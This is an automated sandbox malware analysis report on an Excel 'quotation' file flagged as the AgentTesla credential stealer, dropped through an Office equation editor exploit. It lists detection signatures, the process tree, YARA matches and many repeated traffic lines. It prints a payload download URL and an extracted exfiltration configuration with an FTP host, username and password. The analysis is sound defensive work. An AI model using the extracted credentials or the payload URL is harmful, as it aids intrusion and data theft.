Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quotation - Optical Eyeglasses.xlsx

Overview

General Information

Sample Name:Quotation - Optical Eyeglasses.xlsx
Analysis ID:680486
MD5:936a314411e4a93f2dd6a01b51216ef3
SHA1:47483467b595bdd9a49b577f457d84bcdb3b1c3b
SHA256:0897c1227e00e63196869de72f0e4436e8493a7ee095be94a914d4e547d6ac2e
Tags:xlsx
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Injects a PE file into a foreign processes
Shellcode detected
Office equation editor drops PE file
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Office equation editor establishes network connection
Drops PE files to the user root directory
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2648 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1160 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • Regasm_svchost.exe (PID: 2884 cmdline: "C:\Users\Public\Regasm_svchost.exe" MD5: A6439DBBF3F848EB6F83494C5C75A7A6)
      • Regasm_svchost.exe (PID: 616 cmdline: C:\Users\Public\Regasm_svchost.exe MD5: A6439DBBF3F848EB6F83494C5C75A7A6)
  • cleanup
{"Exfil Mode": "FTP", "FTP Host": "ftp://ftp.alonsorojasmudanzasnacionales.com/", "Username": "okok@alonsorojasmudanzasnacionales.com", "Password": "(gt)~^6!Sq6-"}
SourceRuleDescriptionAuthorStrings
00000006.00000002.1174667673.0000000002588000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000005.00000002.989370105.000000000278B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      00000005.00000002.989818369.0000000003628000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000005.00000002.989818369.0000000003628000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000005.00000002.989818369.0000000003628000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
          • 0x66ff3:$a13: get_DnsResolver
          • 0x9b613:$a13: get_DnsResolver
          • 0xcfa33:$a13: get_DnsResolver
          • 0x65809:$a20: get_LastAccessed
          • 0x99e29:$a20: get_LastAccessed
          • 0xce249:$a20: get_LastAccessed
          • 0x67971:$a27: set_InternalServerPort
          • 0x9bf91:$a27: set_InternalServerPort
          • 0xd03b1:$a27: set_InternalServerPort
          • 0x67c8d:$a30: set_GuidMasterKey
          • 0x9c2ad:$a30: set_GuidMasterKey
          • 0xd06cd:$a30: set_GuidMasterKey
          • 0x65910:$a33: get_Clipboard
          • 0x99f30:$a33: get_Clipboard
          • 0xce350:$a33: get_Clipboard
          • 0x6591e:$a34: get_Keyboard
          • 0x99f3e:$a34: get_Keyboard
          • 0xce35e:$a34: get_Keyboard
          • 0x66c26:$a35: get_ShiftKeyDown
          • 0x9b246:$a35: get_ShiftKeyDown
          • 0xcf666:$a35: get_ShiftKeyDown
          Click to see the 12 entries
          SourceRuleDescriptionAuthorStrings
          6.0.Regasm_svchost.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            6.0.Regasm_svchost.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              6.0.Regasm_svchost.exe.400000.0.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
              • 0x32b57:$s10: logins
              • 0x325be:$s11: credential
              • 0x2ebc0:$g1: get_Clipboard
              • 0x2ebce:$g2: get_Keyboard
              • 0x2ebdb:$g3: get_Password
              • 0x2fec6:$g4: get_CtrlKeyDown
              • 0x2fed6:$g5: get_ShiftKeyDown
              • 0x2fee7:$g6: get_AltKeyDown
              6.0.Regasm_svchost.exe.400000.0.unpackWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
              • 0x302a3:$a13: get_DnsResolver
              • 0x2eab9:$a20: get_LastAccessed
              • 0x30c21:$a27: set_InternalServerPort
              • 0x30f3d:$a30: set_GuidMasterKey
              • 0x2ebc0:$a33: get_Clipboard
              • 0x2ebce:$a34: get_Keyboard
              • 0x2fed6:$a35: get_ShiftKeyDown
              • 0x2fee7:$a36: get_AltKeyDown
              • 0x2ebdb:$a37: get_Password
              • 0x2f686:$a38: get_PasswordHash
              • 0x306a3:$a39: get_DefaultCredentials
              5.2.Regasm_svchost.exe.365ed50.11.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                Click to see the 22 entries

                Exploits

                barindex
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.12.89.152, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1160, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49179
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1160, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mon[1].exe
                No Snort rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: Quotation - Optical Eyeglasses.xlsxVirustotal: Detection: 35%Perma Link
                Source: Quotation - Optical Eyeglasses.xlsxReversingLabs: Detection: 31%
                Source: http://198.12.89.152/mon/mon.exehhC:Avira URL Cloud: Label: malware
                Source: ftp://ftp.alonsorojasmudanzasnacionales.com/okokAvira URL Cloud: Label: malware
                Source: http://198.12.89.152/mon/mon.exeAvira URL Cloud: Label: malware
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mon[1].exeJoe Sandbox ML: detected
                Source: C:\Users\Public\Regasm_svchost.exeJoe Sandbox ML: detected
                Source: 6.0.Regasm_svchost.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                Source: 6.0.Regasm_svchost.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "FTP Host": "ftp://ftp.alonsorojasmudanzasnacionales.com/", "Username": "okok@alonsorojasmudanzasnacionales.com", "Password": "(gt)~^6!Sq6-"}

                Exploits

                barindex
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\Regasm_svchost.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\Regasm_svchost.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 198.12.89.152 Port: 80
                Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

                Software Vulnerabilities

                barindex
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_033F05B6 ShellExecuteW,ExitProcess,
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_033F0517 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_033F0588 URLDownloadToFileW,ShellExecuteW,ExitProcess,
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_033F0531 URLDownloadToFileW,ShellExecuteW,ExitProcess,
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_033F05A1 ShellExecuteW,ExitProcess,
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_033F045C ExitProcess,
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_033F05DB ExitProcess,
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_033F0491 URLDownloadToFileW,ShellExecuteW,ExitProcess,
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
                Source: global trafficTCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
